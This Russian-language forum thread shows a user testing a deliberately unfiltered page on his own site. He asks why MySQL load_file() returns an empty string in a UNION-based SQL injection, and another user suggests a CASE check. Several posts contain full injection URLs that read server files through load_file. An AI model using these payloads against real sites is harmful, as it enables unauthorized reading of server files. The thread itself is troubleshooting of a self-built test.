почему load_file() возвращает пустую строку "" ?

[pompiduskus]

Добрый день.

Я у себя на сайте создал страницу на которой вообще не фильтруются данные от юзера, и пытаюсь выполнить это:

mysql::5.6.25-73.1

Код:

pompiduskus2.0fees.us/db_test.php?id=-32+union+all+select+1,version(),load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))--

Запрос успешно выполняется, но содержимое файла не выдается.

Что странно, сервара sql / web находятся в разных местах и стало быть фидеть содержимое другого сервера они не могут (или могут ?).
Но в тоже время и ошибки тоже нету о том что такого файла нету (NULL не выводит).

Может быть такое что в новых версиях встроен некий механизм фильтрации ?

[Stilet]

Дыры латаешь?
А с чего ты взял, что доступ к файлу есть?

[pompiduskus]

Можно сказать и так.
Но он же должен хотя бы NULL выдать даже если нет прав FILE? или это не обязательно ?

[Пепел Феникса]

а может это скрипт так выдает что NULL и пустая строка это одно и тоже?

[pompiduskus]

Точно, наврное так и есть. Как я сам не додумался

[Stilet]

Ага. Кажется это можно проверить через case.

Код:

case load_file(...) is NULL then "Ашыпка" else load_file(...) end

[pompiduskus]

Да, точно. Так и выходит если использовать CASE. То точно выдает отрицательный результат

Код:

pompiduskus2.0fees.us/db_test.php?id=-32+union+all+select+1,2,case+when+load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))+is+NULL+then+"File_is_NULL"+else+load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))+end--

[Stilet]

Цитата:

pompiduskus2.0fees.us

Попал ты, парень ))
Ща тебя какеры всякие ломать будут
Ну погоди, заяц ))))

[pompiduskus]

=) Это те Которые КулХаЦкеры =))) Если они то Все пропало!